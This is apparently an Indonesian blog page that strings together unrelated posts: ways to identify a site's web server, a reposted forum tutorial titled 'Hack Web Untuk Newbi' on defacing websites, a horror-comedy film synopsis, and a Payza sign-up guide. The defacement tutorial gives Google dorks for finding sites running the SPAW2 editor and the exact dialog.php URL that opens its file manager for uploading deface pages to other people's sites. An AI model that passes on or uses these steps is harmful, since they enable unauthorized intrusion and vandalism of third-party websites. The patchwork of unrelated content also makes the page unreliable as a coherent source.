Ada 2 metode untuk mengetahui web server yang digunakan sebuah website.

Metode Pertama: test Apache error .htaccess


Cara ini adalah cara tercepat untuk mengetahui apakah suatu website menggunakan web server apache atau IIS. Sebagai catatan cara ini tidak selalu berhasil menampilkan informasi web server yang digunakan, tapi patut dicoba. Jika cara ini gagal untuk mengetahui informasi web server, coba metode kedua. Berikut langkah-langkahnya:

Step 1: Sebagai contoh kita ingin mengetahui web server apa yang digunakan oleh www.swimsmooth.com. Jalankan web browser yang biasa anda gunakan seperti: Chrome, Mozilla Firefox, dll

Step 2: Di address bar browser anda, ketik URL home page + .htaccess. Berikut contoh lengkap penulisan di address bar:

http://www.swimsmooth.com/.htaccess

Step 3: Tekan Enter dan lihat hasil yang ditampilkan. By default, Apache web server akan menampilkan halaman forbidden error 403, karena .htaccess tidak dapat diakses secara publik. Kemudian akan ditampilkan informasi web server yang digunakan seperti screen shot berikut:



Dari screen shot diatas jelas terlihat bahwa www.swimsmooth.com di hosting menggunakan Apache Web Server, karena forbidden error 403 akan menambahkan Apache Server Tag dibawahnya.


Contoh lainnya, mari kita coba www.dotnetspider.com. Menggunakan "test Apache error .htaccess" akan menampilkan seperti screen shot berikut:


Gambar diatas menampilkan bahwa www.dotnetspider.com dihosting menggunakan IIS Web Server.

Metode Kedua: Menggunakan online tool.

 

Menggunakan online tool http://web-sniffer.net/

Step 1: Akses URL http://web-sniffer.net/
Step 2: Di bagian “HTTP(S)-URL,” ketik URL lengkap website yang akan diperiksa. Sebagai contoh kita akan coba cari tahu web server yang digunakan oleh dagang.com. Ketik URL: http://www.dagang.com/.
Step 3: Pilih “HTTP/1.1.” di bagian HTTP Version.
Step 4: Pilih "GET" dan set user agent dengan "Web-Sniffer."
Step 5: Klik "Submit."

Sekarang perhatikan hasilnya dibawah “HTTP Response Header” dan lihat value “Server:.” Dagang.com menggunakan Apache web server karena di value tertulis "Apache".
web-sniffer adalah tool yang cukup handal dan bisa melacak selama website tersebut masih online. 

Menggunakan online tool Netcraft.

Keunggulan menggunakan Netcraft adalah tidak hanya menampilkan web server yang digunakan, tapi juga mampu menampilkan Sistem Operasi yang digunakan.

Step 1: akses http://uptime.netcraft.com/up/
Step 2: Di bagian “What’s that site running?", masukkan nama domain spt: dagang.com
Step 3: Klik search. Hasilnya akan ditampilkan seperti screen shot berikut:


 Data di atas menampilkan bahwa dagang.com running di Sistem Operasi Linux, menggunakan Apache web server dan record tercatat dari 8 Maret 2005. Namun, untuk saat ini Sistem Operasi yang digunakan tidak dapat diketahui.

Selasa, 09 Juli 2013

Hack Web Untuk Newbi

(Pemula)Tutor Lengkap+Gambar Deface Spaw Upload Vulnerably Maaf sebelumnya buat para mimin dan momod
kalau saya repost
dari tutor http://hacker-newbie.org/showthread.php?...light=spaw
Kalau memang tidak berguna silahkan hapus

Menurut saya Threed ini sangat berguna untuk yang benar-benar
pemula seperti saya,,soalnya mengingat beberapa hari lalu ada yang post http://hacker-newbie.org/showthread.php?tid=12893 menanyakan dari mana memulai untuk deface,,disini akan dijelaskan dengan GAMBAR semoga berguna buat yang bener-bener pemula seperti saya Hantu

Oke mari dibahas

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”
Lihat gambar

Spoiler Hide
[Image: 30j334i.jpg]

Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

Lihat gambar
Spoiler Hide
[Image: 9u4wup.jpg]

setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

LIHAT GAMBAR
Spoiler Hide
[Image: 2z4a0s3.jpg]
Spoiler Hide
[Image: zv3bjo.jpg]

Tekan Enter
Akan Terbuka Gambar Seperti INI
LIHAT TUTOR DALAM GAMBAR
Spoiler Hide
[Image: x35s29.jpg]
Spoiler Hide
[Image: 14jqof7.jpg]

Lanjut
lihat terus gambar tutor ada didalam gambar
Spoiler Hide
[Image: 2m6of8l.jpg]

LANJUT
Spoiler Hide
[Image: 2076hw4.jpg]

Lanjut TUTOR ADA DI GAMBAR
Spoiler Hide
[Image: 2884dbc.jpg]

LANJUT
Spoiler Hide
[Image: 34y4ahe.jpg]

SELESAI
Semoga bisa dimengerti

KALAU GAMBAR KURANG JELAS DIREFRESH AJA ATAU BUKA SATU-SATU YAH

SUmber Hn..

Film Indonesia Pocong ngesot


Asep (23), pemuda desa yang lugu namun over pede, tertantang untuk mencari pekerjaan layak, demi menikahi kekasih tercintanya, Lilis (22). Sebab, abahnya Lilis, Abah Dading (50), tak pernah setuju putri semata wayangnya berhubungan dengan Asep lantaran Asep kerjanya cuman nggembalain kebo sama ngebajak sawah orang. Abah Dading pengennya Lilis menikah dengan anak kuliahan yang diyakini bermasa depan cerah.
Demi membuktikan dirinya mampu menjadi orang sukses dan kaya raya, Asep memutuskan pergi ke kota besar. Setiba di kota, Asep tinggal di rumah kontrakan bersama Kubil, Bonar, dan Wanda. Asep melakukan gerak cepat dengan mengajukan lamaran kerja ke berbagai perusahaan berbekal ijazah SMA-nya. Bingung dan putus asa mulai melanda Asep. Apalagi Asep mendapat kabar bahwa abahnya Lilis sudah menemukan cowok kaya raya buat pendamping hidupnya. Lilis mendesak Asep cepat mendapatkan pekerjaan yang layak. Karena, Lilis telah buat kesepakatan dengan abah bahwa jika dalam jangka 3 bulan Asep belum juga mendapat pekerjaan, Lilis bersedia melepaskan Asep.
Bonar dan Kubil menyuruh Asep konsultasi sama dukun. Dukun pun menyarankan Asep nyepi di sebuah pohon trembesi (pohon beringin) yang diyakini keramat. Dukun juga memberikan catatan mantra yang musti dibaca selama nyepi di pohon trembesi keramat itu. Dukun juga mengingatkan agar sesajen yang dibawa musti lengkap tanpa kurang satu apapun.
Setelah melakukan nyepi di pohon trembesi keramat, kejadian-kejadian aneh dan konyol pun mengganggu Asep. Entah mengapa, Asep kerap disantroni penampakkan berupa pocong ngesot. Dan bukan cuman Asep, Kubil, Bonar, Wanda, Devina dan Pretty juga diganggu penampakkan pocong ngesot. Kekacauan pun tak terelakkan. Pekerjaan yang diharapkan Asep segera diperolehnya setelah menjalani tapa sepi di pohon trembesi, juga tak kunjung ada. Malah, Asep kini ketiban sial melulu. Lalu, tiap dateng mau ngelamar ke perusahaan, Asep diusir tanpa sebab jelas.
Asep nyesel nyepi di pohon trembesi keramat. Seandainya Asep berpikir dulu sebelum bertindak. Yah, seandainya. Wajah Lilis pun seakan memudar dari bayangannya. Semua karena Asep takut kehilangan cintanya, Lilis. Berniat mendapatkan nasib baik, malah musibah yang datang. Asep dan teman-temannya pun memikirkan cara agar terbebas dari gangguan pocong ngesot, tuyul, dan wewe gombel. Berhasilkah mereka?[

Cara Daftar Payza

Payza adalah : suatu layanan jasa pembayaran dan pengiriman uang melalui internet atau secara online dengan aman dan cepat. Jadi dengan Payza kamu dapat menarik semua gaji yang kamu miliki dari bisnis online (Payza, salah satu syarat untuk memulai bisnis online), bahkan dapat menarik langsung ke rekening bank local anda seperti BCA, BNI, Mandiri ataupun bank lain. Cara daftar Payza atau Alertpay labih simple dari pada daftar PayPal.

Cara daftar Payza. Jika telah melakukan transaksi maka pihak Payza akan mengirimkan kepada keduanya yaitu Anda dan orang yang bertransaksi dengan Anda, e-mail konfirmasi sebagai tanda bukti pembayaran. Payza merupakan rekening online yang sangat praktis dan aman karena kita bisa melakukan transaksi dengan melalui jaringan internet saja dan uang yang kita miliki bisa kita cairkan melalui Rekening Pribadi kita. Tidak hanya itu Payza menjamin kerahasiaan informasi pribadi anda, sehingga siapapun tidak akan dapat mengakses informasi kita dan Anda akan selalu aman dalam setiap melakukan transaksi online karena Payza menggunakan system keamanan dengan teknologi Called Secure Socket Layer (128 bit SSL) sehingga pada saat transaksi tidak ada yang dapat membaca informasi kita, sehingga uang Anda akan selalu aman dari heackher yang nakal. 
Cara menarik dana dari rekening Payza
Payza mempunyai beberapa metode penarikan :
- Transfer BANK
- CEK
Berikut Langkah Cara Daftar Payza
1. Buka halaman website Payza silahkan KLIK DISINI
Lalu Klik Sign Up Now!
2. Pilih negara dan jenis account. Untuk jenis account Pilih “Personal Pro” .
3. Isi Formulir dengan lengkap. Data harus sesuai dengan KTP.
4. Selanjutnya Anda harus melengkapi data untuk login Anda, mulai dari email, password, Dan PIN untuk bertransaksi (seperti di ATM). Masukkan, dan jangan sampai lupa. Lengkapilah dengan data yang tepat dan mudah diingat. Setelah lengkap Klik Final Step (Contohnya Seperti pada gambar di bawah).
5. Kemudian Anda akan diminta untuk melakukan Validasi Via Email. Bukalah email yang Anda gunakan sewaktu mendaftar tadi. Setelah itu, pada inbox (kotak masuk) cari email validasi dari Payza. Setelah itu Klik Link Validate yang ada di Email anda.
6. Selamat, Anda sekarang sudah punya account Payza, Tapi statusnya masih Unverified. Untuk melakukan verifikasi bisa menggunakan Nomor HandPhone. Klik Return to Login.
7. Langkah selanjutnya silahkan login dulu, masukkan email dan password yang anda daftarkan, lalu Klik Login atau Tekan Enter.
8. Lalu Klik Unverified lihat seperti contoh pada gambar.
9. Pilih Phone Validation (mobile phone only)
10. Request phone Validation Code, No HP yang masih aktif, terus klik Send Validation Code
11. Tunggu SMS dari Payza. Setelah codenya datang, masukan ke Payza . Jika sudah ada Masukan Kode Verifikasi, kemudian Klik Send.
12. Selamat kini Payza anda sudah VERIFIED dan telah siap untuk di gunakan.
Demikian Cara Daftar Payza